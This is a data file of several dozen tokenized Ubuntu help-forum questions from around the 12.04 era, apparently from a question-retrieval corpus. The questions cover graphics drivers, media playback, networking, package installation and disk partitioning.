170650	screen goes blank when vlc is playing a video	during playback of a video file ( on the hdd ) the screen attempts to go blank . if i move the mouse the blank screen disappears and i am able to see the video again . i have checked the settings ; tools > preferences > all ( to select the advanced menu ) > video and placed a check mark ( ticked ) turn off screensaver ( which , by the way , was already selected ) but this seems to have no effect . the screen is still trying to go blank during video playback . i do not believe that this is an issue with vlc at this point . however , i have been wrong b-4 . any help with this matter is greatly appreciated . my os is linux ubuntu ultimate edition 3.2 thank you in advance .
170657	installing slick2d for ubuntu 12.04	i want to learn game programming and since i 'm taking a course in java at school i thought a java game would be best to start out in . slick2d seems to be the best option for this , and they say it can be installed on linux but the whole process to install it is way over my understanding . can anyone here tell me how to install this on my computer ?
170660	ubuntu 12.04 lts compatible with dell 2950 's through auto provisioning ?	was wondering if ubuntu 12.04 is supported on dell 2950 's through a ram disk image ?
170663	fglrx causing 100 % cpu with xorg and freezing system	my system setup is ubuntu 12.04 server with ( among other things ) the ubuntu-desktop package installed . cpu is an amd fx-6100 and gpu is a radeon hd 5770 . i believe the issue i am having is with the fglrx drivers . i 'm not particularly fond of unity so i installed gnome-session-fallback . after running for between 20 minutes and 2 days a few hundred green pixels will randomly cover my screen . this lasts about 2 seconds , after which the whole computer will lock up . when i remove fglrx and revert to the open source drivers ( per the instructions here , is my ati graphics card supported in ubuntu ? ) i do not have this problem . once it does happen , and i do a hard reset , it happens again in much less time . running unity has also not produced this problem . i have also tried installing catalyst 12.6 from the amd website which resulted in me not being able to load the desktop and caused vertical green lines on the screen after sitting in a tty session for a few minutes . these lines disappeared immediately when any key was pressed . does anyone have an idea of what may be causing this ? ps : if there is any other information that would be helpful please let me know , this is my first post so i 'm not entirely sure what would be useful . thanks edit : last night i logged into unity 2d and left it running all night . when i came back this morning i was not able to wake up the screen . when i logged in via ssh i saw using top that xorg was using 100 % cpu . i then rebooted and reverted back to the open source drivers . edit : in an effort to gather more information i decided to re-install fglrx . i used these instructions to install . after only a couple of minutes it froze again , but this time the green pixels lasted much longer . i was able to grab a picture with my phone , which is shown below . i was still able to interact with the computer while this was happening . i attempted to open the terminal and get the gpu temp and load , but the pixels disappeared and the system locked up before i could . i was able to connect via an ssh session though . the logon message reported that it was not able to write to my .xauthority file . using top i saw that xorg was running at 100 % cpu usage . i was not able to stop xorg with any of : sudo kill -9 1779 where 1779 was the pid of xorg , sudo kill -9 -1 which disconnected me from the ssh session ( thought i was able to reconnect later ) , or sudo service lightdm restart which made the whole screen turn white though . i then did sudo reboot and used the command line to revert to the open source drivers and to remove .xauthority so i could log back in .
170664	which driver should i use with a 9600 gt mobile ?	i checked the additional drivers offered for my card and i saw four options : nvidia accelerated graphics drivers ( version 173 ) nvidia accelerated graphics drivers ( post-release updates ) ( version 173-updates ) nvidia accelerated graphics drivers ( version current ) ( recommended ) nvidia accelerated graphics drivers ( post-release updates ) ( version current-updates ) i 'm not sure which one to pick . i want a driver that 's stable but also takes advantage of my card 's hardware .
170667	how to analysis the output of powertop to increase battery lifetime	i 'm new to ubuntu using 12.04lts .please help me by steps.thanks all . anoy @ ubuntu : ~ $ cat /proc/sys/vm/laptop_mode 5 powertop 1.97 overview idle stats frequency stats device stats tunables the battery reports a discharge rate of 21.7 w summary : 551.2 wakeups/second , 0.0 gpu ops/second and 0.0 vfs ops/sec usage events/s category description 43.7 ms/s 229.1 process /usr/lib/firefox-trunk/fi 17.0 ms/s 109.0 process /usr/bin/x :0 -auth /var/ 2.1 ms/s 42.7 timer tick_sched_timer 4.2 ms/s 35.5 process metacity 1.1 ms/s 34.9 timer hrtimer_wakeup 184.2 ms/s 16.9 process [ loop0 ] 1.4 ms/s 16.1 interrupt [ 44 ] i915 1.5 ms/s 8.4 interrupt [ 16 ] ehci_hcd : usb1 2.7 ms/s 6.7 process /usr/bin/ibus-daemon -- xi 585.4 ms/s 7.4 interrupt [ 7 ] sched ( softirq ) 289.0 ms/s 6.2 process mount.ntfs /dev/disk/by-uuid 1.4 ms/s 5.5 process /usr/lib/bamf/bamfdaemon 2.0 ms/s 5.2 process gnome-terminal 1.6 ms/s 3.6 process unity-2d-shell 0.8 ms/s 2.9 process unity-2d-panel 7.1 ms/s 0.1 kwork ieee80211_scan_work 0.8 ms/s 2.5 process //bin/dbus-daemon -- fork 61.4 ms/s 2.5 process [ ktpacpi_nvramd ] 382.4 ms/s 2.1 process /usr/lib/gnome-settings-daem 193.2 ms/s 2.0 interrupt [ 4 ] block ( softirq ) 2.2 ms/s 0.9 process /usr/bin/python /usr/shar 317.0 ms/s 1.5 process /usr/lib/at-spi2-core/at-spi 4.0 ms/s 0.0 process [ kworker/u:2 ] 168.6 ms/s 1.0 process /bin/dbus-daemon -- config-fi 42.7 ms/s 0.8 kwork ieee80211_iface_work 41.7 ms/s 0.8 process /usr/lib/gvfs/gvfs-afc-volum 5.0 ms/s 0.8 kwork cfq_kick_queue 212.1 ms/s 0.7 interrupt [ 9 ] rcu ( softirq ) 313.1 ms/s 0.3 process /usr/lib/unity/unity-panel-s 9.6 ms/s 0.4 kwork i915_gem_retire_work_handler the battery reports a discharge rate of 18.7 w usage device name 8.8 % cpu use 73.3 % display backlight 73.3 % display backlight 29.8 % display backlight 100.0 % pci device : intel corporation 6 series/c200 series chi 100.0 % pci device : intel corporation 6 series/c200 series chi 100.0 % pci device : intel corporation 6 series/c200 series chi 100.0 % pci device : intel corporation 6 series/c200 series chi 100.0 % pci device : intel corporation 6 series/c200 series chi 100.0 % pci device : intel corporation 6 series/c200 series chi 100.0 % pci device : intel corporation 6 series/c200 series chi 100.0 % pci device : intel corporation 6 series/c200 series chi 100.0 % pci device : intel corporation 6 series/c200 series chi 100.0 % pci device : intel corporation 2nd generation core proc 100.0 % pci device : realtek semiconductor co. , ltd. rtl8188ce 100.0 % usb device : usb-device-04b3-3107 100.0 % pci device : realtek semiconductor co. , ltd. rtl8111/81 100.0 % usb device : ehci host controller 100.0 % pci device : advanced micro devices [ amd ] nee ati seymo 100.0 % pci device : ricoh co ltd device e823 100.0 % pci device : intel corporation xeon e3-1200/2nd generat 100.0 % pci device : intel corporation 2nd generation core proc 100.0 % radio device : rtl8192ce 100.0 % usb device : usb-device-8087-0024 100.0 % pci device : intel corporation 6 series/c200 series chi 71.1 pkts/s network interface : wlan0 ( rtl8192ce ) 0.0 pkts/s network interface : eth0 ( r8169 ) 0.0 rpm laptop fan 0.0 % radio device : thinkpad_acpi 0.0 % audio codec hwc0d0 : conexant 0.0 % audio codec hwc0d3 : intel tunables bad enable sata link power management for /dev/sda < br/ > bad nmi watchdog should be turned off < br/ > bad vm writeback timeout < br/ > bad autosuspend for unknown usb device 1-1.3 ( 04b3:3107 ) < br/ > bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci < br/ > bad runtime pm for pci device intel corporation 2nd generation core processor family int < br/ > bad runtime pm for pci device intel corporation 6 series/c200 series chipset family mei < br/ > bad runtime pm for pci device intel corporation 6 series/c200 series chipset family usb < br/ > bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci < br/ > bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci < br/ > bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci < br/ > bad runtime pm for pci device intel corporation 6 series/c200 series chipset family 6 po < br/ > bad runtime pm for pci device advanced micro devices [ amd ] nee ati seymour [ radeon hd 64 < br/ > bad runtime pm for pci device intel corporation xeon e3-1200/2nd generation core process < br/ > bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci < br/ > bad runtime pm for pci device intel corporation 6 series/c200 series chipset family usb < br/ > good enable audio codec power management < br/ > good power aware cpu scheduler < br/ > good autosuspend for usb device ehci host controller [ usb1 ] < br/ > good autosuspend for unknown usb device 2-1 ( 8087:0024 ) < br/ > good autosuspend for usb device integrated camera ( ricoh company ltd. ) < br/ > good autosuspend for usb device ehci host controller [ usb2 ] < br/ > good autosuspend for unknown usb device 1-1 ( 8087:0024 ) < br/ > good runtime pm for pci device realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi < br/ > good runtime pm for pci device intel corporation 6 series/c200 series chipset family high < br/ > good runtime pm for pci device ricoh co ltd device e823 < br/ > good runtime pm for pci device realtek semiconductor co. , ltd. rtl8111/8168b pci express < br/ > good runtime pm for pci device intel corporation 2nd generation core processor family dra < br/ > good wake-on-lan status for device eth0 < br/ > good wake-on-lan status for device wlan0 < br/ > good using 'ondemand ' cpufreq governor < br/ >
170668	intel_do_flush_locked failed input/output error	sometimes while running apps using opengl , the following message comes in the command line where i run the app . i have a sandy bridge integrated graphics card ( the same as in the bug reports ) intel_do_flush_locked failed : input/output error running any subsequent opengl apps fail with the same error . also this is displayed in the system log [ 7730.683403 ] [ drm : i915_wait_request ] *error* i915_wait_request returns -11 ( awaiting 1322416 at 1322415 , next 1322417 ) i have seen many bugs about this but none of them seem to have a solution . is there any workaround for this ( apart from disabling opengl ) ?
170671	how to revert ubuntu back to stock	is there any command or methods to remove all the packages and applications that i installed in ubuntu desktop/server and revet it back to the stock setup .
170680	ffmpeg/avconv - the -psp option no longer works on sony walkman	since the changeover from ffmpeg to avconv , the -psp option does not seem to render video correctly for sony walkman - `` file format not supported '' , it was perfect before . ffmpeg -i video.avi -f psp -s 320x240 -vb 500k -ac 2 -ab 128k video.mp4 even the `` long hand '' version does not produce working results . ffmpeg -i video.avi -acodec libfaac -ab 128k -s 320x240 -vcodec libx264 -b 500k -flags +loop -cmp +chroma -partitions +parti4x4+partp8x8+partb8x8 -flags2 +mixed_refs -me_method umh -subq 6 -trellis 1 -refs 5 -coder 0 -me_range 16 -g 250 -keyint_min 25 -sc_threshold 40 -i_qfactor 0.71 -bt 500k -maxrate 768k -bufsize 2m -qcomp 0.6 -qmin 10 -qmax 51 -qdiff 4 -level 13 -threads 0 -f mp4 video.mp4 does anyone have any ideas ?
170682	how to download streaming video from a flash player ( stopstream ) ?	my problem is very similar to this post , the only difference is before the flash video is up , there are few flash ads showing , i tried to follow the steps in the answer in that post , but got lost due to too many ad flashes , is there any other easier way to find out the download server in the step 2 when there are flash ads before the actual flash video ? here 's an example link : http : //www.stopstream.tv/39/76/397656.html ps : i 'm not sure if i 'm doing the right way , i tried to add comment to the op , but since my rep is just 6 , i ca n't add comment , this is why i 'm creating a new question . thanks michael
170685	keyboard layout indicator get disappeared after second login ( login after logout )	i`ve added two keyboard layouts because i use english as my second language . whenever i logout ( ubuntu 12.04 32bit ) then login , keyboard layout disappears and it 's not possible to switch between languages i 've added before . i tested that on my brother 's laptop ( ubuntu 12.04 64bit ) and everything was ok . does anybody know what to do to get rid of this bad issue ?
170687	how to install gcc-4.4.6 ?	my computer has ubuntu 11.10 32-bit os . i downloaded gcc4.4.6 core package ( tar file ) , unzipped it and tried the following : ./configure sudo make install which gave me the following error : vidhya @ vidhya-reserved : ~/desktop/gcc-4.4.6 $ sudo make install make [ 1 ] : entering directory `/home/vidhya/desktop/gcc-4.4.6' /bin/bash ./mkinstalldirs /usr/local /usr/local /bin/bash : line 3 : cd : host-i686-pc-linux-gnu/fixincludes : no such file or directory make [ 1 ] : *** [ install-fixincludes ] error 1 make [ 1 ] : leaving directory `/home/vidhya/desktop/gcc-4.4.6' make : *** [ install ] error 2 could anyone please help me install any gcc 4.x version ?
170688	how do i install internet download manager on ubuntu 12.04	i want to install an internet download manager which integrates with my browsers and download at lightning fast speed ; i have used uget but the speed is n't satisfactory .
170690	how to connect creative gigaworks progamer g550w wireless speakers through a serial port	these connect through a device on a serial port transmitting audio signal via wi-fi . the traditional jack is on `` the other '' end of the system . i could not find anything on the creative labs website regaring linux setup , neither on the internet . i have n't used them yet , even on windows ( found them at work ) . any idea how to go about connecting these ? you can see the speakers here : http : //www.tomshardware.com/reviews/new-generation-pc-5-1-speaker-systems,1526-4.html edit : the question was based on a wrong assumption that these speakers connect through a serial port which makes it invalid but i am leaving it here for others , there is actually nothing complicated in connecting g550w
170693	dual monitors with different resolution	i 'm on an old lg r405 with the built in graphics card : nvidia g86 geforce8600 gs rev a1 seeing as it has a vga output , i figured that it 'd be nice to use my hd screen ( benq senseye g2222hdl ) it works perfectly with my osx partition , but booting up with ubuntu does n't work at all . initially when i installed 12.04 clean everything was fine , except for the screens being swapped left to right . when i swapped places in the setup application everything started going bad . the screen content was scrambled totally , i could n't even see where the mouse was at to reboot the computer and had to hold the power button down . if i forget to unplug the screen when booting into ubuntu , the resolution of the laptop screen is set really high , but as soon as i log in , the contents get scrambled again . please advice . /m
170696	how do i log in with a user that is not included on the list in ubuntu 12.04 ?	i am using ubuntu 12.04 64 bit . i have created a system user so as to keep it out of the login screen with sudo adduser -- group -- system markpaskal , but i can not login from the greeter because there is no 'other ' option . short of stopping lightdm and using startx from a virtual terminal , do i have any way of logging in to this account ? should i be seeing the 'other ' option ?
170702	problem after trying to install 64bit ubuntu using wubi from mounted iso file	i tried installing ubuntu x64 . i mounted the .iso file using daemon tools , and copied its contents on my usb . i already configured bios to boot from usb . i found wubi.exe in that mounted .iso file . i ran it and it installed ubuntu , then it said , i must reboot . i selected reboot now options . when it boots , it says no wubildr , then it says completing the ubuntu installation ( or something like that ) and some stuff . if i press esc it goes to black screen , and nothing happens . i have : hp pavilion g7 1303 cpu : 64 bit cpu graphic card : amd radeon hd 7450m , 1 gb memory
170712	how do i share my internal hard drive ?	i have installed ubuntu on a 3 tb internal hard drive . i want to use it as a server . how do i share the entire internal hard drive on my network ?
170717	how can i install boost 1.50 on ubuntu 12.04 ?	the libboost-dev package in the repos is an older one and i would like to use the newest release . i 'm ok with installing from source , but am a little confused by the instructions on the site . it instructs to run ./b2 install -- prefix=prefix where prefix is a directory where you want boost.build to be installed . what should prefix be set to so that the libraries and headers are available for the compilers to find without specifying custom paths ?
170720	how to prevent screen from going black ( back light is shut down ) at startup ( laptop ) ubuntu 12.04 ?	so , in may laptop with ubuntu 12.04 , the startup is like this : 1 ) i see the ubuntu logo with the 5 dots on a purple background for a few seconds . 2 ) the screen goes completely black ( no back light ) , but it 's not shut down , i can still see shadows . 3 ) the system is fully loaded ( i can log-in ) , but the screen is still shadowy ( no back light ) . 4 ) i have to wait about 1 minute ( logged or not ) for the back light to turn on . how do i prevent the system from shutting the back light at startup ?
170722	intel hd 3000 not working in ubuntu 12.04	my laptop is msi ge620 dx and it has nvidia optimus technology . intel and nvidia gfx cards . however ubuntu doesn´t even regonize my intel hd 3000 at all ! i even tried fedora 17 on my system and it did regonize intel hd 3000 straight away . but not in ubuntu . can´t set the correct resolution , or run gnome 3 for example . the card just isn´t regonized . i tried install mesa-utils , but no , did not help . i can´t use software that needs 3d in ubuntu , but in fedora , everything works .
170723	prevent the guest account from accessing a particular flash usb pen drive key ?	my pen drive is very important to me . i have a 32gb one , with ubuntu 12.04 on it . on then pen drive , i created two partitions ; one ext4 for ubuntu ( 5gb ) and the other partition is fat32 , so that windows can access it too , with restrictions . windows users without my permission ca n't see nor modify anything in my fat32 partition . however , when i boot from my pen drive and log in with guest account , i can see the fat32 partition and do whatever with it , delete it if i want . i just want to restrict access to that particular pen drive ( only for the guest account ) . i also do n't want to disable the guest account , because if somebody boots from my pen drive and just want to check mail or save an image from the internet to their own pen drive , they need to be able to see/mount their pen drive .
170728	how to disable external dns recursion ?	i know that to disable recursive queries in bind , i need add the following lines to the options section of /etc/bind/named.conf.options allow-transfer { `` none '' ; } ; allow-recursion { `` none '' ; } ; recursion no ; will the above configuration disable all dns recursive queries ? how can i disable dns recursion only to external network queries and keep recursion only for internal network ? if i disable the recursion , then what process will be performed by the bind resolve the name request ? iterative or inverse ?
170729	how to install apt packages ?	i 'm running ubuntu 11.04 machine . i had accidentally removed python2.7.2 which i 've sorted now , gui is running and all other commands like easy_install , pip are working . but when i type any apt commands like apt-get , apt-cache i get following error : /usr/bin/python : ca n't find '_ _main _ _ ' module in '/usr/share/command-not-found' how can i fix this ?
170735	add right click menus to nautilus without nautilus-actions	i want to know how i can add action when the user right-clicks on specific mime-types or folders without the use of nautilus-actions . i would be happy if this was possible using nautilus scripts as well , but i want them to show up only at specific mime types . i believe it is possible : ubuntu one does it .
170738	ubuntu does n't see my usb hard drive	i have a 500 gb usb hard drive ntfs partitioned that worked till yesterday , but today it does n't work at all . it does n't show up on my ubuntu machine , now in windows xp or windows 7 , i tried several usb cables and ports , but the results are the same . when i plug it in the light goes on and the disk spins , so i know it `` works '' , but it does n't show up in gparted , fdisk or lsusb . this is the result of dmesg | grep -i usb : vito @ n76-ubuntu-vito : ~ $ dmesg | grep -i usb [ 1.212416 ] usbcore : registered new interface driver usbfs [ 1.212424 ] usbcore : registered new interface driver hub [ 1.212440 ] usbcore : registered new device driver usb [ 1.565462 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 1.565533 ] ehci_hcd 0000:00:1a.0 : new usb bus registered , assigned bus number 1 [ 1.584213 ] ehci_hcd 0000:00:1a.0 : usb 2.0 started , ehci 1.00 [ 1.584320 ] hub 1-0:1.0 : usb hub found [ 1.584426 ] ehci_hcd 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 1.604199 ] ehci_hcd 0000:00:1d.0 : usb 2.0 started , ehci 1.00 [ 1.604296 ] hub 2-0:1.0 : usb hub found [ 1.604341 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 1.604351 ] uhci_hcd : usb universal host controller interface driver [ 1.604457 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 3 [ 1.604700 ] hub 3-0:1.0 : usb hub found [ 1.604787 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 4 [ 1.604863 ] hub 4-0:1.0 : usb hub found [ 1.640245 ] usbcore : registered new interface driver libusual [ 1.896080 ] usb 1-1 : new high-speed usb device number 2 using ehci_hcd [ 2.028888 ] hub 1-1:1.0 : usb hub found [ 2.140044 ] usb 2-1 : new high-speed usb device number 2 using ehci_hcd [ 2.272299 ] hub 2-1:1.0 : usb hub found [ 2.439778 ] usb 3-1 : new low-speed usb device number 2 using xhci_hcd [ 2.461930 ] usb 3-1 : ep 0x81 - rounding interval to 64 microframes , ep desc says 80 microframes [ 2.467776 ] input : logitech usb laser mouse as /devices/pci0000:00/0000:00:14.0/usb3/3-1/3-1:1.0/input/input4 [ 2.467859 ] generic-usb 0003:046d : c062.0001 : input , hidraw0 : usb hid v1.10 mouse [ logitech usb laser mouse ] on usb-0000:00:14.0-1/input0 [ 2.467867 ] usbcore : registered new interface driver usbhid [ 2.467868 ] usbhid : usb hid core driver [ 2.531932 ] usb 1-1.1 : new full-speed usb device number 3 using ehci_hcd [ 2.695682 ] usb 1-1.3 : new high-speed usb device number 4 using ehci_hcd [ 10.443457 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 10.443487 ] usbcore : registered new interface driver btusb [ 10.898016 ] uvcvideo : found uvc 1.00 device asus usb2.0 webcam ( 1bcf:2883 ) [ 10.915702 ] input : asus usb2.0 webcam as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.3/1-1.3:1.0/input/input5 [ 10.915750 ] usbcore : registered new interface driver uvcvideo [ 10.915751 ] usb video class driver ( 1.1.1 ) [ 11.077666 ] usbcore : registered new interface driver ath3k [ 11.297581 ] usb 1-1.1 : usb disconnect , device number 3 [ 11.499244 ] usb 1-1.1 : new full-speed usb device number 5 using ehci_hcd there 's a really important backup on this hard drive and it 's crucial for me to retrieve it , no matter what . thanks for your help .
170742	thunar does n't show any rabbitvcs emblems	i 'm using xubuntu 12.04 and installed rabbitvcs v0.15.0.5 for thunar from the ppa . unfortunately , there are no svn status emblems on my folders in thunar . i already tried to update the icon cache as explained here . did the emblems ever work in thunar ? i 'm not really sure , because usually rabbitvcs is used together with nautilus .
170751	only one of my two network cards is working	i have a ubuntu 10.04 lts server which has two ethernet ports eth0 and eth1 . eth0 is connected to isp1 with network 192.168.3.0/24 with server static address 192.168.3 . 5 eth1 is connected to isp2 with network 192.168.5.0/24 with server static address 192.168.5.10 when eth1 is connected , there is no internet connection from eth0 . the internal network is accessible , eg , ssh , ping from other computers in 192.168.3.0/24 network . when eth1 is disabled or disconnected , eth0 works just fine . how can i ensure that both the ethernet ports get internet connections ? netstat configs eth1 disabled kernel ip routing table destination gateway genmask flags mss window irtt iface 192.168.3.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 0.0.0.0 192.168.3.1 0.0.0.0 ug 0 0 0 eth0 netstat config eth1 enabled kernel ip routing table destination gateway genmask flags mss window irtt iface 192.168.3.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.5.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 0.0.0.0 192.168.5.254 0.0.0.0 ug 0 0 0 eth1 0.0.0.0 192.168.3.1 0.0.0.0 ug 0 0 0 eth0 edit i have also checked /etc/resolv.conf there , i have manually added the nameserver for both the gateways . ip addr show 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state unknown qlen 1000 link/ether 11 : bb:3e:15:3e:0e brd ff : ff : ff : ff : ff : ff inet 192.168.3.100/24 brd 192.168.3.255 scope global eth0 valid_lft forever preferred_lft forever 3 : eth1 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 100 link/ether aa:2a : ae:5f:59 : e8 brd ff : ff : ff : ff : ff : ff inet 192.168.5.100/24 brd 192.168.5.255 scope global eth1 valid_lft forever preferred_lft forever
170754	problem using wget to download an entire website	as said in wget man page : to download a single page and all its requisites ( even if they exist on separate websites ) , and make sure the lot displays properly locally , this author likes to use a few options in addition to -p : wget -e -h -k -k -p http : //mysite.com/directory i understand , if i want to download mysite entirely , i have to add -r argument . but using both -r and -h options yields downloading all the website reachable from http : //mysite.com/directory . any idea ?
170756	unable to boot live cd to resize disk partition	i have a working version of 11.10 installed on vmware but i need to increase my disk space . i tried to boot from iso ( on windows drive ) , but neither f2 , f12 or esc seem to work . i wanted to boot from live cd and run gparted to resize the partition .
170763	problem after updating nvidia driver in 12.04 from x-swat repo	recently i installed ubuntu on my new system which has a nvidia graphics card . after installing ubuntu 12.04 , i felt that the screen resolution was not good and though it was maybe because the nvidia drivers were not installed , so i tried to install the driver using the following commands : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current after installation i restarted my system . upon restarting , the system hangs on a screen which displays nvidia logo and does not proceed . can someone help me ?
170764	ubuntu dash not showing software results and software center freezing / not bringing up gksu prompt	i posted a video to youtube , and i think the youtube description and/or video ( a short desktop recording with me speaking ) pretty much sum it up . http : //youtu.be/eanzre1rqrs [ description on video ] i just wanted to post this to the askubuntu.com forums . this is for an up to date ubuntu 12.04 ( `` precise pangolin '' ) installed on a laptop . if anyone has an idea why either the software center will freeze when launching , or why the dash ( or even alt-f2 ) ca n't find installed software like gnome-terminal , gedit , or firefox when i type it , i am interested to hear your comments . [ /end description ] thank you for your time . : ) edit : i noticed these problems around the same time so i have reason to suspect they are related . and i 'll admit , the way i like to roll is with a root prompt - by using `` sudo bash '' , entering my password , and running admin commands to do things that you need the prompt for . i dislike entering my password many times , and i do things that are appropriate for standard user privileges in another tab most of the time anyway . but software center freezing on me and nothing coming up on the dash when i hit the button with an ubuntu logo on it and type a program 's name is a slight inconvenience which less knowledgeable users may ( either never encounter ) or find it impossible to work around . i tried searching for a solution with google for a while but did n't come up with much .
170766	creating shortcut to a network location on desktop	i am currently trying to make a desktop shortcut pointing to a network location . i believe there 's a way to do this and that i am probably missing something simple . can anyone able to point me in the right direction ? i am trying to create a short cut pointing to : \192.168.1.90
170775	offline dictionary with pronunciation and usages	which is the best offline dictionary for ubuntu ? it should be like cambridge or oxford dictionaries with pronunciation . the dictionaries , i found did not have enough examples of the sentence in use nor do they tell a lot about meaning .
170779	no `` additional drivers '' for radeon 2100 under ubuntu 12.04	after the upgrade to 12.04 , it does n't find drivers for my radeon 2100 in the `` additional drivers '' window . i ca n't remember having problems with this before . moving windows etc is very slow , and i suspect this is because of the missing driver . is there an easy way to install the driver for radeon 2100 on ubuntu 12.04 ? $ lspci -nn | grep vga 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati radeon 2100 [ 1002:796e ]
170786	cinnamon update does not work ubuntu 12.04	i used the following commands to install cinnamon : # sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable # sudo apt-get update # sudo apt-get install cinnamon this is what i get from the first command : executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.mrz2ukfgfw -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv 109c2938f84496d6acb6d805a777609328949509 gpg : requesting key 28949509 from hkp server keyserver.ubuntu.com gpg : key 28949509 : `` launchpad gwendal le bihan '' not changed gpg : total number processed : 1 gpg : unchanged : 1 this is what i get from the second one : executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.mrz2ukfgfw -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv 109c2938f84496d6acb6d805a777609328949509 gpg : requesting key 28949509 from hkp server keyserver.ubuntu.com gpg : key 28949509 : `` launchpad gwendal le bihan '' not changed gpg : total number processed : 1 gpg : unchanged : 1 and this is what i get from the third one : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
170787	firefox flash player fullscreen mouse does n't disapear 12.04 ?	in ubuntu 12.04 , firefox 's flash-player , full screen mode . when i want to watch a video that is not youtube , the mouse pointer should disappear , just like it does windows , but in ubuntu 12.04 it does not , how do i make it disappear ? i ca n't hide it in the screen corners because : i can see it if i put it in the top corners . in bottom corners , the controls wo n't disappear . so , how to make the mouse pointer disappear in flash player 's full screen mode , on a site that is not youtube ? again , in youtube works , the mouse pointer disappears , just like it should .
170790	displaylink display nearly working on 10.10	here 's what they look like at the moment . here are 2 images : http : //i.imgur.com/hpho5.jpg and http : //i.imgur.com/hpho5.jpg . i ca n't seem to find anyone else with this screen , and i 've just installed libdlo drivers . i 've seen other posts where people have gotten it to work after editting their xorg.conf , but i ca n't seem to find that either .
170793	create partition for windows 7	i have a full ubuntu installation on my hard drive . but im in need of windows 7 too now . i found this guide on askubuntu : how do i install windows 7 alongside a pre-existing ubuntu installation ? but when it comes to the second sentence in answers section im lost as to how i will do this . `` second , boot the ubuntu desktop cd , resize your partitions , and make a ntfs partition for windows '' is there a guide out there that will show me the right way without losing all my files ?
170797	high cpu load during flash playback	i got a cpu load indicator applet and whenever i play a flash vid i see it going through the roof and staying high . i 'm running 12.04 with the latest updates , restricted extras installed . browser is firefox .
170801	enabling single left-click for expo in compiz	i 've got my 12.04 almost running exactly how i want but i have a small issue with the expo plugin in ccsm . i 'd like to use my left button to single click out of expo instead of double clicking . i realise that i can single right click but i 'd prefer to have my left button do this . any help would be greatly appreciated !
170810	32 bit packages in 64 bit ubuntu	can i install the downloaded 32 bit packages to 64 bit os ? ( now using ubuntu 12.04 ( 32bit ) and going to install ubuntu 12.04 ( 64bit ) on another pc . )
170817	hdd partition help	i have 4 os 's on my dual boot system : backtrack 5 , windows 7 , ubuntu 12.04 lts , and lubuntu . my win7 os is kinda broken ( i hate windows now : p ) , and i am now using my ubuntu installation . i only have 14gb of free space , and i would like more . so , i need to take some from my windows installation , and give it to my ubuntu os . bear in mind i need to keep my windows system intact , i need to take about 20gb if possible . can anyone tell me how to do this ?
170819	how to program logitech function keys ?	most logitech keyboards have function keys and by pressing the fn button and one of f1 to f12 they perform some specific function . in windows , for example with `` setpoint '' , you can change their functionality . as an example : i 'm not talking about changing shortcuts . some of these function keys ( common keys like home , email , etc.. ) are known in ubuntu . for example ubuntu known fn + f1 as homepage , but some special function keys like [ in my case ] flip , show desktop and other functions that designed for windows , known as combination of super with another key . for example ubuntu known [ in my case ] fn + f6 , that represent show desktop , as super + d. the question is `` how could i define them in ubuntu as a new key ? '' is it possible ? p.s : i read related questions and their answers , but i did n't get my answer . i emphasize that i 'm not talking about keyboard shortcuts and i 'm actually talking about defining a new keyboard key type and sorry for my bad english xd
170822	how to get brcmsac wireless drivers working ?	i just installed ubuntu 12.04 on my hp pavilion dv6 series laptop , and i am trying to get the included broadcom 4313 wireless chipset to work on monitor mode , i googled and found out that monitor mode is not supported with the default sta broadcom drivers , and many users recommended using the brcmsmac drivers which i understand are included in this version of ubuntu , the question is : how do i properly purge/blacklist/delete the sta broadcom drivers so they do n't cause problems with the brcmsmac ? , and how do i set the brcmsmac driver to work properly ? thanks in advance
170825	how do i get vlc in the context menu in nautilus ?	when right-clicking on a directory once i got an entry `` open with vlc '' . now with precise this entry is gone . how can i get it back ? edit : yes i have it in the submenu `` open with '' . but how can i get it in the top menu ?
170833	how do i uninstall the cinelerra package ?	i am new to ubuntu , i installed cinelerra through these steps sudo add-apt-repository ppa : cinelerra-ppa/ppa sudo apt-get update sudo apt-get install cinelerra now i want to uninstall it , how is it done ?
